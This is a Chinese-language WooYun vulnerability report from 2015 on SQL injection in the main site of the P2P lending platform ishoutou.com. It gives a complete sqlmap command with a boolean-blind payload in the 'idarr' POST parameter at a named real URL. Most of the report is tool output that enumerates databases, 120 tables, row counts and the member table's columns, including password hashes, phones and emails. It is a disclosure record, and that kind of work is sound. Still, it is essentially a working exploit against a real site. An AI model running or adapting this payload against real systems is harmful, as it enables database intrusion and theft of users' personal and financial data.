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漏洞作者: 路人甲

提交时间:2015-12-13 20:25

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01





漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]


4人收藏 收藏



2015-12-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-25: 厂商已经主动忽略漏洞,细节向公众公开


我听说老板发iPhone 6plus?
主站注入 另泄露商城数据库



python sqlmap/sqlmap.py -u "https://www.ishoutou.com/home/feedback/doDel" --data "idarr=updatexml(1,if(1=1*,1,0x22),1)" --dbms=mysql --technique=B --random-agent --threads=10 --current-user

sqlmap identified the following injection points with a total of 11 HTTP(s) requests:
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [4]:
[*] ecshop2015
[*] information_schema
[*] mysql
[*] shoutouwang
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current database: 'shoutouwang'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: shoutouwang
[120 tables]
| lzh_9yue |
| lzh_acl |
| lzh_activity_diy |
| lzh_activity_diy_log |
| lzh_ad |
| lzh_applylog |
| lzh_area |
| lzh_article |
| lzh_article_area |
| lzh_article_category |
| lzh_article_category_area |
| lzh_auser_dologs |
| lzh_ausers |
| lzh_auto_borrow |
| lzh_bank_list |
| lzh_borrow_info |
| lzh_borrow_info_lock |
| lzh_borrow_investor |
| lzh_borrow_tip |
| lzh_borrow_verify |
| lzh_borrow_vouch |
| lzh_comment |
| lzh_current_info |
| lzh_current_investor |
| lzh_donate |
| lzh_enterprise |
| lzh_face_apply |
| lzh_feedback |
| lzh_friend |
| lzh_friend_copy |
| lzh_friend_copy1 |
| lzh_global |
| lzh_handler |
| lzh_hetong |
| lzh_homsuser |
| lzh_id5log |
| lzh_inner_msg |
| lzh_interface_token |
| lzh_invest_credit |
| lzh_invest_detb |
| lzh_investor_detail |
| lzh_izhubo |
| lzh_jifen_choujiang |
| lzh_jubao |
| lzh_k_invest |
| lzh_k_loan |
| lzh_kvtable |
| lzh_llpayinfo |
| lzh_llpaylog |
| lzh_llpaypost |
| lzh_loan |
| lzh_market_address |
| lzh_market_goods |
| lzh_market_jifenlist |
| lzh_market_log |
| lzh_media |
| lzh_member_address |
| lzh_member_alipay |
| lzh_member_apply |
| lzh_member_banks |
| lzh_member_borrow_show |
| lzh_member_contact_info |
| lzh_member_creditslog |
| lzh_member_data_info |
| lzh_member_department_info |
| lzh_member_ensure_info |
| lzh_member_financial_info |
| lzh_member_friend |
| lzh_member_house_info |
| lzh_member_info |
| lzh_member_integrallog |
| lzh_member_limitlog |
| lzh_member_login |
| lzh_member_money |
| lzh_member_moneylog |
| lzh_member_msg |
| lzh_member_ou |
| lzh_member_payonline |
| lzh_member_remark |
| lzh_member_safequestion |
| lzh_member_to |
| lzh_member_withdraw |
| lzh_member_yott |
| lzh_members |
| lzh_members_status |
| lzh_name_apply |
| lzh_navigation |
| lzh_oauth |
| lzh_payment_log |
| lzh_promote |
| lzh_promote_other |
| lzh_qq |
| lzh_recommendlog |
| lzh_redbag |
| lzh_redbag_list |
| lzh_rongzi |
| lzh_sendlog |
| lzh_shares_additional |
| lzh_shares_apply |
| lzh_shares_global |
| lzh_shares_holiday |
| lzh_shares_lever |
| lzh_shares_rateconfig |
| lzh_shares_record |
| lzh_shares_supply |
| lzh_shares_type |
| lzh_smslog |
| lzh_sys_tip |
| lzh_tmplog |
| lzh_today_reward |
| lzh_transfer_borrow_info |
| lzh_transfer_borrow_info_lock |
| lzh_transfer_borrow_investor |
| lzh_transfer_detail |
| lzh_transfer_investor_detail |
| lzh_verify |
| lzh_video_apply |
| lzh_vip_apply |
| lzh_yott_log |
| lzh_yott_money_log |
Database: shoutouwang
| Table | Entries |
| lzh_tmplog | 136820 |
| lzh_member_moneylog | 115837 |
| lzh_sendlog | 85064 |
| lzh_member_login | 84250 |
| lzh_redbag_list | 40000 |
| lzh_inner_msg | 38826 |
| lzh_auser_dologs | 36153 |
| lzh_members | 34000 |
| lzh_members_status | 33195 |
| lzh_member_info | 32846 |
| lzh_member_money | 26282 |
| lzh_activity_diy_log | 18592 |
| lzh_investor_detail | 18396 |
| lzh_member_payonline | 15986 |
| lzh_llpaylog | 11644 |
| lzh_borrow_investor | 11267 |
| lzh_name_apply | 10035 |
| lzh_member_integrallog | 9857 |
| lzh_interface_token | 7637 |
| lzh_yott_log | 7381 |
| lzh_member_banks | 6470 |
| lzh_member_creditslog | 5008 |
| lzh_member_ou | 4973 |
| lzh_member_withdraw | 4511 |
| lzh_area | 3412 |
| lzh_llpaypost | 3333 |
| lzh_promote_other | 2282 |
| lzh_id5log | 1722 |
| lzh_llpayinfo | 1334 |
| lzh_recommendlog | 801 |
| lzh_member_yott | 529 |
| lzh_borrow_info | 464 |
| lzh_borrow_info_lock | 464 |
| lzh_borrow_verify | 464 |
| lzh_yott_money_log | 451 |
| lzh_activity_diy | 433 |
| lzh_article | 330 |
| lzh_verify | 215 |
| lzh_member_limitlog | 210 |
| lzh_today_reward | 129 |
| lzh_promote | 84 |
| lzh_auto_borrow | 80 |
| lzh_member_to | 46 |
| lzh_global | 38 |
| lzh_article_category_area | 30 |
| lzh_article_category | 29 |
| lzh_navigation | 27 |
| lzh_bank_list | 21 |
| lzh_ausers | 19 |
| lzh_applylog | 12 |
| lzh_izhubo | 12 |
| lzh_shares_global | 12 |
| lzh_media | 11 |
| lzh_ad | 10 |
| lzh_acl | 9 |
| lzh_friend | 8 |
| lzh_friend_copy | 6 |
| lzh_friend_copy1 | 6 |
| lzh_qq | 5 |
| lzh_shares_lever | 5 |
| lzh_shares_rateconfig | 5 |
| lzh_vip_apply | 5 |
| lzh_shares_type | 4 |
| lzh_9yue | 1 |
| lzh_redbag | 1 |
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: shoutouwang
Table: lzh_members
[30 columns]
| Column | Type |
| active_integral | int(15) |
| area | int(10) unsigned |
| city | int(10) unsigned |
| credits | int(10) |
| customer_id | int(10) unsigned |
| customer_name | varchar(20) |
| ent | tinyint(1) |
| id | int(10) unsigned |
| integral | int(15) |
| invest_credits | decimal(15,2) unsigned |
| is_ban | int(11) |
| is_borrow | int(2) |
| is_transfer | int(2) |
| is_vip | tinyint(3) |
| last_log_ip | char(15) |
| last_log_time | int(10) |
| pin_pass | char(32) |
| province | int(10) unsigned |
| recommend_id | int(10) unsigned |
| reg_ip | varchar(15) |
| reg_time | int(10) unsigned |
| reward_money | decimal(15,2) |
| tid | int(11) |
| time_limit | int(10) unsigned |
| user_email | varchar(50) |
| user_leve | tinyint(4) |
| user_name | varchar(50) |
| user_pass | char(32) |
| user_phone | varchar(11) |
| user_type | tinyint(3) unsigned |
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user: 'shoutouwang@%'



以证明 不深入



版权声明:转载请注明来源 路人甲@乌云




漏洞Rank:15 (WooYun评价)